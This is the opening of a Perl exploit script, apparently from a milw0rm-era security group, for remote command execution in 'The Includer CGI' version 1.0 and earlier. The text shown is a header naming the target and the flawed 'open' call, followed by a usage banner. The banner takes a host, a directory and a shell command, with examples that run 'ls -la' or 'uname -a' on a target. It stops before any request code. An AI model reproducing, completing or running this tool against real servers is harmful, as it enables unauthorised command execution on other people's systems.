############################################################
# Target - The Includer CGI <= 1.0 #
# #
# Based on - http://www.milw0rm.com/id.php?id=862 #
# #
# Info about bug - Stupid use "Open" function. #
# #
############################################################
# If you want know more visit our home page at nst.void.ru #
############################################################
use IO::Socket;
if (@ARGV < 3)
{
print " \n Includer CGI <= 1.0 Network Security Team - nst.void.ru\n\n";
print " Usage: <target> <dir> <cmd>\n\n";
print " <host> - Host name of taget.\n";
print " <dir> - If not in dir type / symbol.\n";
print " <cmd> - command for execution.\n\n";
print " Examples:\n\n";
print " incl_10.pl 127.0.0.1 /cgi-bin/ \"ls -la\"\n";
print " incl_10.pl 127.0.0.1 / \"uname -a\"\n";
print " incl_10.pl www.test.com / \"ps auxw\"\n";
exit();
}